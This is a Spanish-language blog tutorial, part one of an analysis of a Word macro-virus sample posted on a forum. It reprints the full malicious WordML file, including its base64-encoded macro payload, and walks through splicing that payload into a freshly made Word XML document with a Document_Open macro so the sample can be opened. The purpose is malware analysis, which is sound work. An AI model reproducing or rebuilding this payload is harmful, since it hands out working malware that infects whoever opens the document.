martes, 29 de marzo de 2016

Analizando Una Muestra De Un Virus De Macro[PARTE 1]

Hola amigos en este tutorial analizaremos una muestra de un virus hecho en macro, dicha muestra fue es puesta en el foro el hacker.net aquí el link del tema:

https://foro.elhacker.net/analisis_y_diseno_de_malware/virus_de_macro_en_archivo_rtf-t449858.0.html

el tema fue abierto por el compañero novato3 que subió la siguiente muestra del binario

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<?mso-application progid="Word.Document"?>
<w:wordDocument xmlns:w="http://schemas.microsoft.com/office/word/2003/wordml" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:sl="http://schemas.microsoft.com/schemaLibrary/2003/core" xmlns:aml="http://schemas.microsoft.com/aml/2001/core" xmlns:wx="http://schemas.microsoft.com/office/word/2003/auxHint" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882" xmlns:wsp="http://schemas.microsoft.com/office/word/2003/wordml/sp2" w:macrosPresent="yes" w:embeddedObjPresent="no" w:ocxPresent="no" xml:space="preserve"><w:ignoreElements w:val="http://schemas.microsoft.com/office/word/2003/wordml/sp2"/><o:DocumentProperties><o:Title>    </o:Title><o:Author>gfdcdscdsccc</o:Author><o:LastAuthor>павуваыва</o:LastAuthor><o:Revision>4</o:Revision><o:TotalTime>3</o:TotalTime><o:Created>2016-03-17T08:03:00Z</o:Created><o:LastSaved>2016-03-17T12:58:00Z</o:LastSaved><o:Pages>1</o:Pages><o:Words>1</o:Words><o:Characters>12</o:Characters><o:Company>sdfdsf</o:Company><o:Lines>1</o:Lines><o:Paragraphs>1</o:Paragraphs><o:CharactersWithSpaces>12</o:CharactersWithSpaces><o:Version>11.0000</o:Version></o:DocumentProperties><w:fonts><w:defaultFonts w:ascii="Times New Roman" w:fareast="Times New Roman" w:h-ansi="Times New Roman" w:cs="Times New Roman"/></w:fonts><w:styles><w:versionOfBuiltInStylenames w:val="4"/><w:latentStyles w:defLockedState="off" w:latentStyleCount="156"/><w:style w:type="paragraph" w:default="on" w:styleId="a"><w:name w:val="Normal"/><wx:uiName wx:val="Обычный"/><w:rsid w:val="00A0471D"/><w:rPr><wx:font wx:val="Times New Roman"/><w:sz w:val="24"/><w:sz-cs w:val="24"/><w:lang w:val="RU" w:fareast="RU" w:bidi="AR-SA"/></w:rPr></w:style><w:style w:type="character" w:default="on" w:styleId="a0"><w:name w:val="Default Paragraph Font"/><wx:uiName wx:val="Основной шрифт абзаца"/><w:semiHidden/></w:style><w:style w:type="table" w:default="on" w:styleId="a1"><w:name w:val="Normal Table"/><wx:uiName wx:val="Обычная таблица"/><w:semiHidden/><w:rPr><wx:font wx:val="Times New Roman"/></w:rPr><w:tblPr><w:tblInd w:w="0" w:type="dxa"/><w:tblCellMar><w:top w:w="0" w:type="dxa"/><w:left w:w="108" w:type="dxa"/><w:bottom w:w="0" w:type="dxa"/><w:right w:w="108" w:type="dxa"/></w:tblCellMar></w:tblPr></w:style><w:style w:type="list" w:default="on" w:styleId="a2"><w:name w:val="No List"/><wx:uiName wx:val="Нет списка"/><w:semiHidden/></w:style><w:style w:type="table" w:styleId="hgfdcdscccTable"><w:name w:val="hgfdcdsccc Table"/><w:semiHidden/><w:rsid w:val="00A0471D"/><w:rPr><wx:font wx:val="Times New Roman"/></w:rPr><w:tblPr><w:tblInd w:w="0" w:type="dxa"/><w:tblCellMar><w:top w:w="0" w:type="dxa"/><w:left w:w="108" w:type="dxa"/><w:bottom w:w="0" w:type="dxa"/><w:right w:w="108" w:type="dxa"/></w:tblCellMar></w:tblPr></w:style></w:styles><w:docSuppData><w:binData w:name="dXwofzTuXeucPAU6FUix.mso">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
87YAAAvwBAAAABI0Vng=
</w:binData></w:docSuppData><w:docPr><w:view w:val="print"/><w:zoom w:percent="100"/><w:proofState w:spelling="clean" w:grammar="clean"/><w:formsDesign/><w:attachedTemplate w:val=""/><w:defaultTabStop w:val="708"/><w:punctuationKerning/><w:characterSpacingControl w:val="DontCompress"/><w:optimizeForBrowser/><w:relyOnVML/><w:allowPNG/><w:validateAgainstSchema/><w:saveInvalidXML w:val="off"/><w:ignoreMixedContent w:val="off"/><w:alwaysShowPlaceholderText w:val="off"/><w:compat><w:breakWrappedTables/><w:snapToGridInCell/><w:wrapTextWithPunct/><w:useAsianBreakRules/><w:dontGrowAutofit/></w:compat><wsp:rsids><wsp:rsidRoot wsp:val="000D47C0"/><wsp:rsid wsp:val="000D47C0"/><wsp:rsid wsp:val="00395638"/><wsp:rsid wsp:val="00576851"/><wsp:rsid wsp:val="00694D89"/><wsp:rsid wsp:val="00757B86"/><wsp:rsid wsp:val="00846A31"/><wsp:rsid wsp:val="00906632"/><wsp:rsid wsp:val="00A0471D"/><wsp:rsid wsp:val="00A20FF1"/><wsp:rsid wsp:val="00CF7E1D"/><wsp:rsid wsp:val="00EB7913"/></wsp:rsids></w:docPr><w:body><wx:sect><w:p wsp:rsidR="000D47C0" wsp:rsidRDefault="000D47C0"><w:r><w:t>    </w:t></w:r></w:p><w:p wsp:rsidR="000D47C0" wsp:rsidRDefault="000D47C0"/><w:p wsp:rsidR="000D47C0" wsp:rsidRDefault="000D47C0"/><w:p wsp:rsidR="000D47C0" wsp:rsidRDefault="000D47C0"/><w:p wsp:rsidR="000D47C0" wsp:rsidRDefault="000D47C0"/><w:p wsp:rsidR="000D47C0" wsp:rsidRDefault="000D47C0"><w:r><w:t>   </w:t></w:r></w:p><w:sectPr wsp:rsidR="000D47C0" wsp:rsidSect="00A0471D"><w:pgSz w:w="11906" w:h="16838"/><w:pgMar w:top="1134" w:right="850" w:bottom="1134" w:left="1701" w:header="708" w:footer="708" w:gutter="0"/><w:cols w:space="708"/><w:docGrid w:line-pitch="360"/></w:sectPr></wx:sect></w:body></w:wordDocument>

para analizar la muestra copiaremos este binario en un editor hexadecimal, yo utilizare este:
http://mh-nexus.de/en/hxd

en este tutorial no diré como instalarlo,bueno seguimos a la hora de abrirlo nos aparecerá algo así


después daremos clic en archivo y en nuevo y aparecer un documento en blanco así



ahora ven el cuadrito que apunta la flecha, hay es donde pegaremos el código anterior dando clic derecho y pegar insertado así




luego de a ver insertado el código guardamos el archivo en el escritorio con el nombre de virus.xml



ahora bien si intentamos abrir el archivo virus.xml con el Microsoft Office Word verán que nos manda el siguiente error



ahora bien para brincarnos este error crearemos un archivo .xml en Microsoft Office Word con una macro, para luego remplazar el código de nuestra macro por la macro del virus

para eso damos clic en archivo y después en nuevo documento en blanco


ahora nos iremos a la ficha de programador

Nota: Yo uso Microsoft Office 2007

Nota: si no les aparece la ficha programador pueden visualizarla así, dando clic en archivo, luego en opciones de word y por ultimo en la ficha mas frecuente palomeamos la opción ver la ficha programador en la cinta de opciones




ahora que ya tenemos la ficha programador, daremos clic en ella y después en Visual Basic




después daremos doble clic aquí


luego daremos clic en la pestaña General y elegimos la opción Document



ahora daremos clic en la opción Declaraciones y elegimos la opción Open


ahora bien en la función Document_Open escribimos el siguiente linea

Msgbox "Hola Mundo"

después de esto guardamos el documento dando clic aquí


yo lo aguardare en el escritorio con el nombre doc1 y elegimos la opción de Documento XML de Word 2003


y se preguntaran que hace este documento pues bien si habilitamos el uso de macros cada ves que abramos el archivo que acabamos de crear nos mandara el mensaje de "Hola Mundo"

después de a ver creado nuestro archivo Doc1.xml con nuestra macro adentro, es hora de reemplazarle el código, para eso nos iremos otra ves al editor hexadecimal y le daremos clic en la ficha abrir


y elegimos el archivo que creamos anterior mente



después de esto nos iremos hasta el offset  000025B1 y remplazaremos desde aquí hasta la dirección 00003392 por el código siguiente:

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
